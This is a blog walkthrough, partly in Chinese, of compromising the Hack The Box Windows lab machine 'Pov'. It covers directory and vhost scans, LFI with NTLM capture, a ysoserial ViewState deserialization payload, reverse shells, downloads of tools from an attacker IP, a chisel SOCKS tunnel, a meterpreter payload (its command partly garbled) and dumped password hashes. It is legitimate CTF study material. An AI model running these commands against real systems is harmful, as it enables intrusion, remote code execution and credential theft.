Zumpyx Blog

Pov

Machines#585MediumWindows


|__ |__ |) |) | / ` / \ _/ | | \ |__
| |___ | \ | \ | _, _/ / \ | |/ |_ by Ben “epi” Risher 🤓 ver: 2.10.1 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://pov.htb/ 🚀 Threads │ 50 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.1 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 1 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with –dont-filter 200 GET 13l 55w 5918c http://pov.htb/img/logo.png 200 GET 2l 284w 14244c http://pov.htb/js/aos.js 200 GET 4l 10w 382c http://pov.htb/img/favicon.png 200 GET 19l 133w 11607c http://pov.htb/img/smart-protect-2.jpg 200 GET 5l 26w 1732c http://pov.htb/img/client-5.png 200 GET 22l 132w 13356c http://pov.htb/img/smart-protect-1.jpg 301 GET 2l 10w 141c http://pov.htb/js => http://pov.htb/js/ 301 GET 2l 10w 142c http://pov.htb/css => http://pov.htb/css/ 200 GET 6l 20w 1480c http://pov.htb/img/client-2.png 200 GET 3l 15w 1063c http://pov.htb/img/client-4.png 200 GET 162l 286w 2399c http://pov.htb/css/custom.css 200 GET 8l 34w 2034c http://pov.htb/img/client-3.png 200 GET 3l 20w 1898c http://pov.htb/img/client-6.png 200 GET 23l 207w 11858c http://pov.htb/img/smart-protect-3.jpg 200 GET 14l 43w 2390c http://pov.htb/img/client-1.png 301 GET 2l 10w 142c http://pov.htb/img => http://pov.htb/img/ 200 GET 4l 66w 31000c http://pov.htb/font-awesome-4.7.0/css/font-awesome.min.css 200 GET 2l 220w 25983c http://pov.htb/css/aos.css 200 GET 339l 1666w 139445c http://pov.htb/img/feature-1.png 200 GET 325l 1886w 151416c http://pov.htb/img/feature-2.png 200 GET 6l 1643w 150996c http://pov.htb/css/bootstrap.min.css 200 GET 234l 834w 12330c http://pov.htb/ 301 GET 2l 10w 142c http://pov.htb/CSS => http://pov.htb/CSS/ 301 GET 2l 10w 141c http://pov.htb/JS => http://pov.htb/JS/ 301 GET 2l 10w 141c http://pov.htb/Js => http://pov.htb/Js/ 301 GET 2l 10w 142c http://pov.htb/Css => http://pov.htb/Css/ 301 GET 2l 10w 142c http://pov.htb/IMG => http://pov.htb/IMG/ 301 GET 2l 10w 142c http://pov.htb/Img => http://pov.htb/Img/ 404 GET 40l 156w 1888c http://pov.htb/con 404 GET 40l 156w 1888c http://pov.htb/aux 400 GET 6l 26w 324c http://pov.htb/error%1F_log 404 GET 40l 156w 1888c http://pov.htb/prn


- Virtual Host

```bash
ffuf -u http://pov.htb/ -H 'Host: FUZZ.pov.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 12330
---
dev                     [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 323ms]
  • dev.pov.htb

image-20240128113158143.png

  • Dir Scan
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        3l        8w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        2l       10w      156c http://dev.pov.htb/portfolio/assets/ => http://dev.pov.htb:8080/portfolio
302      GET        2l       10w      156c http://dev.pov.htb/portfolio/assets/vendors/jquery/ => http://dev.pov.htb:8080/portfolio
200      GET       38l      258w    20768c http://dev.pov.htb/portfolio/assets/imgs/folio-3.jpg
200      GET       32l       73w      782c http://dev.pov.htb/portfolio/assets/js/steller.js
302      GET        2l       10w      156c http://dev.pov.htb/portfolio/assets/vendors/ => http://dev.pov.htb:8080/portfolio
302      GET        2l       10w      156c http://dev.pov.htb/portfolio/assets/vendors/themify-icons/css/ => http://dev.pov.htb:8080/portfolio
200      GET      106l      271w     4691c http://dev.pov.htb/portfolio/contact.aspx
302      GET        2l       10w      156c http://dev.pov.htb/portfolio/assets/imgs/ => http://dev.pov.htb:8080/portfolio
302      GET        2l       10w      156c http://dev.pov.htb/portfolio/assets/vendors/bootstrap/ => http://dev.pov.htb:8080/portfolio
200      GET       99l      213w     4446c http://dev.pov.htb/portfolio/assets/imgs/logo.svg
200      GET      162l      483w     4838c http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.affix.js
302      GET        2l       10w      156c http://dev.pov.htb/portfolio/assets/css/ => http://dev.pov.htb:8080/portfolio
302      GET        2l       10w      156c http://dev.pov.htb/portfolio/assets/vendors/themify-icons/ => http://dev.pov.htb:8080/portfolio
302      GET        2l       10w      156c http://dev.pov.htb/portfolio/assets/js/ => http://dev.pov.htb:8080/portfolio
200      GET      144l      883w    55365c http://dev.pov.htb/portfolio/assets/imgs/folio-2.jpg
200      GET     1081l     1807w    16450c http://dev.pov.htb/portfolio/assets/vendors/themify-icons/css/themify-icons.css
200      GET       52l      394w    33816c http://dev.pov.htb/portfolio/assets/imgs/folio-6.jpg
200      GET      126l      692w    55960c http://dev.pov.htb/portfolio/assets/imgs/blog-3.jpg
200      GET      105l      502w    40401c http://dev.pov.htb/portfolio/assets/imgs/avatar-1.jpg
200      GET      118l      695w    61432c http://dev.pov.htb/portfolio/assets/imgs/avatar.jpg
200      GET      123l      822w    67260c http://dev.pov.htb/portfolio/assets/imgs/blog-2.jpg
200      GET      423l     1217w    21371c http://dev.pov.htb/portfolio/default.aspx
200      GET      245l     1128w    80751c http://dev.pov.htb/portfolio/assets/imgs/blog-1.jpg
200      GET       86l      557w    46195c http://dev.pov.htb/portfolio/assets/imgs/avatar-2.jpg
301      GET        2l       10w      159c http://dev.pov.htb/portfolio/assets => http://dev.pov.htb/portfolio/assets/
200      GET      194l     1029w    81277c http://dev.pov.htb/portfolio/assets/imgs/folio-5.jpg
200      GET       67l      370w    29350c http://dev.pov.htb/portfolio/assets/imgs/avatar-3.jpg
200      GET      150l      895w    76321c http://dev.pov.htb/portfolio/assets/imgs/folio-1.jpg
200      GET     1052l     2573w    48394c http://dev.pov.htb/portfolio/assets/imgs/man.svg
200      GET      322l     1567w   132049c http://dev.pov.htb/portfolio/assets/imgs/folio-4.jpg
200      GET    11646l    23442w   242029c http://dev.pov.htb/portfolio/assets/css/steller.css
200      GET     7013l    22369w   222911c http://dev.pov.htb/portfolio/assets/vendors/bootstrap/bootstrap.bundle.js
200      GET    10598l    42768w   280364c http://dev.pov.htb/portfolio/assets/vendors/jquery/jquery-3.4.1.js
200      GET      423l     1217w    21359c http://dev.pov.htb/portfolio/
301      GET        2l       10w      159c http://dev.pov.htb/portfolio/Assets => http://dev.pov.htb/portfolio/Assets/
200      GET      106l      271w     4691c http://dev.pov.htb/portfolio/Contact.aspx
200      GET      423l     1217w    21371c http://dev.pov.htb/portfolio/Default.aspx
200      GET      106l      271w     4691c http://dev.pov.htb/portfolio/CONTACT.aspx
  • 页面上有个下载简历的请求

image-20240128114452113.png

  • 尝试 LFI

image-20240128114703338.png

Shell as User - sfitz

  • 尝试 RFI + Responder 拿到 NTLMv2 Hash

image-20240128114817710.png

  • 查看 web.config

image-20240128120501025.png

  • 可以看到是 4.5 版本的 Framework 尝试利用 Key

https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-parameter#test-case-4-.net-greater-than-4.5-and-enableviewstatemac-true-false-and-viewstateencryptionmode-true

./ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "COMMAND" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

image-20240128133212961.png

image-20240128133238455.png

image-20240128133225380.png

  • Power shell 反弹

image-20240128133337308.png

  • 工作组 Windows,没什么权限

image-20240128142300024.png

Peas

Invoke-WebRequest -Uri http://10.10.16.12/winPEASx64.exe -O peas.exe

Shell as User - alaading

  • 发现凭据

https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters#secure-string-to-plaintext

image-20240128142149268.png

export IP=10.10.11.251 USER1=alaading PASS1=f8gQ8fynP44ek1m3
  • 无 tty Runas
Invoke-WebRequest -Uri http://10.10.16.12/RunasCs.exe -O C:\windows\Temp\RunasCs.exe
C:\windows\Temp\RunasCs.exe alaading f8gQ8fynP44ek1m3 powershell.exe -r 10.10.16.12:2233

image-20240128143403479.png

  • 发现 SeDebugPrivilege 权限

image-20240128143432572.png

Shell as Root

https://github.com/daem0nc0re/PrivFu

image-20240128143609279.png

Msf 上线自动 Dumphash

原理是利用 SeDebugPrivilege 特权,手动可以通过代理 + evil-winrm 利用

https://github.com/scriptchildie/SeDebugPrivilege_privesc

msfvenom -p windows/x64/meterpreter> hashdump/reverse_tcp LHOST=10.10.16.12 LPORT=4444 -f exe -o msf.exe
meterpreter> hashdump
---
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7c883121d0f63ee5b4312ba7572689b:::
alaading:1001:aad3b435b51404eeaad3b435b51404ee:31c0583909b8349cbe92961f9dfa5dbf:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sfitz:1000:aad3b435b51404eeaad3b435b51404ee:012e5ed95e8745ea5180f81648b6ec94:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1fa5b00b7c6cc4ac2807c4d5b3dd3dab:::

Chisel 代理连接

chisel server -p 8081 --reverse

Invoke-WebRequest -Uri http://10.10.16.12/chisel.exe -O C:\users\public\chisel.exe
C:\users\public\chisel.exe client 10.10.16.12:8081 R:socks

image-20240128174937268.png

Dump Hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7c883121d0f63ee5b4312ba7572689b:::
alaading:1001:aad3b435b51404eeaad3b435b51404ee:31c0583909b8349cbe92961f9dfa5dbf:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sfitz:1000:aad3b435b51404eeaad3b435b51404ee:012e5ed95e8745ea5180f81648b6ec94:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1fa5b00b7c6cc4ac2807c4d5b3dd3dab:::